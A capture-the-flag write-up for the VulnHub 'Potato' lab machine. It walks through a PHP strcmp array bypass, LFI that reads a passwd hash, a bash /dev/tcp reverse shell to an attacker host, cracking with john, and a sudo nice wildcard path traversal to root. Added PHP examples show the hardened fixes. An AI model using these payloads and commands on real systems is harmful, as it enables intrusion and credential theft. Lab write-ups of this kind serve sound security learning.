VulnHub - Potato


Techniques involved


  • PHP strcmp bypass
  • LFI
  • Command injection
  • Password cracking

Information gathering


Port scan


Port      Service  Version
22/tcp    ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    http     Apache httpd 2.4.41 ((Ubuntu))
2112/tcp  ftp      ProFTPD

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
| 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Potato company
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg

Web path enumeration


dirsearch -u "http://192.168.0.106" -t 60 -e '*' -x 404,403 --json-report report/output/dirsearch_out.json



The site requires credentials to log in.


FTP enumeration




-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg

Key content of index.php.bak:

<?php

$pass= "potato"; //note Change this password regularly

if($_GET['login']==="1"){
    if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
        echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
        setcookie('pass', $pass, time() + 365*24*3600);
    }else{
        echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
    }
    exit();
}
?>

strcmp bypass


PHP's strcmp() can be bypassed, as described in PHP strcmp Bypass (ABCTF2016 – L33t H4xx0r): passing an array instead of a string makes strcmp() return NULL, and the loose comparison NULL == 0 succeeds.

username=admin&password[]=""

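To make the bypass and its fix concrete, here is an added example (not the Potato box's own index.php and not from the referenced ABCTF write-up): the leaked strcmp() check reproduced as vulnerable_login(), a hardened_login() beside it, and both run against the two request shapes from this write-up. The constants and function names are mine; the password value is the one seen in index.php.bak.

```php
<?php
// Added example, not the Potato box's own index.php: the leaked strcmp() login
// check beside a hardened version, run against the two request shapes above.
//
// Why the bypass works on PHP 7: strcmp() given an array emits a warning and
// returns NULL, and the loose comparison NULL == 0 is true, so
// "username=admin&password[]=" passes without knowing $pass.
// On PHP 8, strcmp() throws a TypeError for a non-string argument instead.

const ADMIN_USER = 'admin';
const ADMIN_PASS = 'potato'; // the value seen in index.php.bak

/** The check as index.php.bak has it: loose == against strcmp(). */
function vulnerable_login($username, $password): bool
{
    // "@" only hides the PHP 7 warning; it does not stop the TypeError on PHP 8.
    return @strcmp($username, ADMIN_USER) == 0 && @strcmp($password, ADMIN_PASS) == 0;
}

/** Hardened check: reject non-strings up front, then compare without type juggling. */
function hardened_login($username, $password): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    static $hash = null;
    if ($hash === null) {
        // In a real deployment the hash would be stored, not derived from a constant.
        $hash = password_hash(ADMIN_PASS, PASSWORD_DEFAULT);
    }
    // hash_equals() is a constant-time string comparison; password_verify() checks the hash.
    return hash_equals(ADMIN_USER, $username) && password_verify($password, $hash);
}

/** Run one check and describe the outcome, catching PHP 8's TypeError. */
function outcome(callable $check, array $req): string
{
    try {
        return var_export($check($req['username'], $req['password']), true);
    } catch (TypeError $e) {
        return 'TypeError (PHP 8 rejects the array argument)';
    }
}

// Constructed request bodies: the real login and the password[]="" bypass.
$requests = [
    'legit'  => ['username' => 'admin', 'password' => 'potato'],
    'bypass' => ['username' => 'admin', 'password' => ['']],
];

foreach (['vulnerable_login', 'hardened_login'] as $check) {
    foreach ($requests as $label => $req) {
        printf("%-16s %-6s => %s\n", $check, $label, outcome($check, $req));
    }
}
```

On PHP 7.x (assumed here; the page does not state the box's PHP version) vulnerable_login() returns true for both requests, while hardened_login() returns true only for the real credentials. The is_string() gate is the part that matters for this bug class: any function that type-juggles or returns NULL on bad input becomes a bypass when its result is compared with ==, so reject unexpected types before comparing, and use hash_equals()/password_verify() rather than strcmp() for secrets.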


Reading credentials via LFI




This yields webadmin's credentials:

webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash

Command injection




Reverse Shell


bash -c 'exec bash -i &>/dev/tcp/192.168.0.108/8848 <&1'



Password cracking


john passwd -w /usr/share/wordlists/rockyou.txt

john --format=md5crypt -w /usr/share/wordlists/rockyou.txt passwd

(screenshot: passwd)

(screenshot: login)


Post-exploitation


Information gathering


.bash_history


(screenshot: bash_history)


Sensitive information

sudo -l

sudo /bin/nice /root/notes/
sudo /bin/nice /root/notes/*

Privilege escalation


sudo -l


User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*

(screenshot: sudo -l)


/bin/nice /notes/*

The rule restricts the argument to the path /notes/*, but the wildcard is matched as a glob, so a path that starts with /notes/ and then climbs out with .. still matches.


(screenshot: ls -alh)


(screenshot: id.sh)


echo "/bin/bash -p" > bash.sh

sudo /bin/nice /notes/../home/webadmin/bash.sh
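The reason the /notes/* rule does not confine the caller is that sudoers argument wildcards are plain shell-style globs, so "*" also matches "../home/webadmin/bash.sh" (which is what the successful sudo run above shows). The following added example (my code, not from the write-up or from sudo) models that match with PHP's fnmatch(), which follows the same fnmatch(3) semantics, and contrasts it with what a wrapper script placed behind the sudo rule should do instead: lexically normalise the path and check the directory prefix. ALLOWED_DIR, RULE_ARG and the function names are assumptions; the candidate paths are constructed, one of them being the traversal from this write-up.

```php
<?php
// Added example, not part of the writeup or of sudo: why a sudoers argument
// wildcard such as "/bin/nice /notes/*" does not confine the caller to /notes,
// and the canonicalise-then-prefix-check a wrapper should perform instead.

const ALLOWED_DIR = '/notes';   // assumption: the directory the rule meant to allow
const RULE_ARG    = '/notes/*'; // the argument pattern from the sudoers rule above

/** Model of the sudoers argument match: a plain glob, where '*' also spans '/'. */
function sudoers_arg_matches(string $pattern, string $arg): bool
{
    return fnmatch($pattern, $arg);
}

/** Lexically normalise an absolute path (resolve "." and "..") without touching the filesystem. */
function normalize_path(string $path): string
{
    $out = [];
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($out);    // climb one level, never above "/"
            continue;
        }
        $out[] = $seg;
    }
    return '/' . implode('/', $out);
}

/** What a wrapper should check: the normalised path stays inside $dir. */
function confined_to(string $dir, string $path): bool
{
    $norm = normalize_path($path);
    return $norm === $dir || strpos($norm, rtrim($dir, '/') . '/') === 0;
}

// Constructed candidate arguments: the intended use, the traversal from the
// writeup, and a path that uses ".." but still ends up inside /notes.
$candidates = [
    '/notes/id.sh',
    '/notes/../home/webadmin/bash.sh',
    '/notes/../notes/id.sh',
];

foreach ($candidates as $arg) {
    printf("%-34s glob match: %-5s confined: %s\n", $arg,
        var_export(sudoers_arg_matches(RULE_ARG, $arg), true),
        var_export(confined_to(ALLOWED_DIR, $arg), true));
}
```

All three candidates satisfy the glob, but only the first and third are confined to /notes after normalisation. The practical mitigations are the same ones this shows: avoid wildcards in sudoers command arguments (list the exact scripts instead), or grant sudo on a wrapper that resolves the argument with realpath() and refuses anything outside the intended directory before executing it.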

(screenshot: root)


(screenshot: root.txt)


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.